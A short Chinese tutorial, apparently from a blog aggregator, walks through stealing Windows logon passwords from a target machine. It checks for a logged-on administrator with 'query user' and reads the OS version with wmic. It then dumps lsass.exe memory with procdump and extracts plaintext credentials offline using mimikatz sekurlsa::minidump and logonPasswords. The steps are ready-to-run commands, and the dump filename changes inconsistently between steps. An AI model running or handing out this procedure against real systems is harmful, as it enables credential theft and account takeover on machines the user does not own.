1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。
query user
Prodump+Mimikatz抓取windows系统密码

2、查看目标系统版本。
wmic OS get Caption,OSArchitecture
Prodump+Mimikatz抓取windows系统密码
3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
Prodump+Mimikatz抓取windows系统密码
4、将lsass.tmp拉取到本地使用mimikatz解密目标系统密码。(本地机器需与目标机器的版本位数一致。)
mimikatz.exe “log res.log” “sekurlsa::minidump tmp.dmp” “sekurlsa::logonPasswords full” exit
Prodump+Mimikatz抓取windows系统密码

相关文章:

  • 2021-10-09
  • 2022-12-23
  • 2021-04-20
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-12-28
  • 2021-08-06
猜你喜欢
  • 2021-12-28
  • 2022-01-12
  • 2022-03-04
  • 2022-12-23
  • 2021-08-13
  • 2022-12-23
相关资源
相似解决方案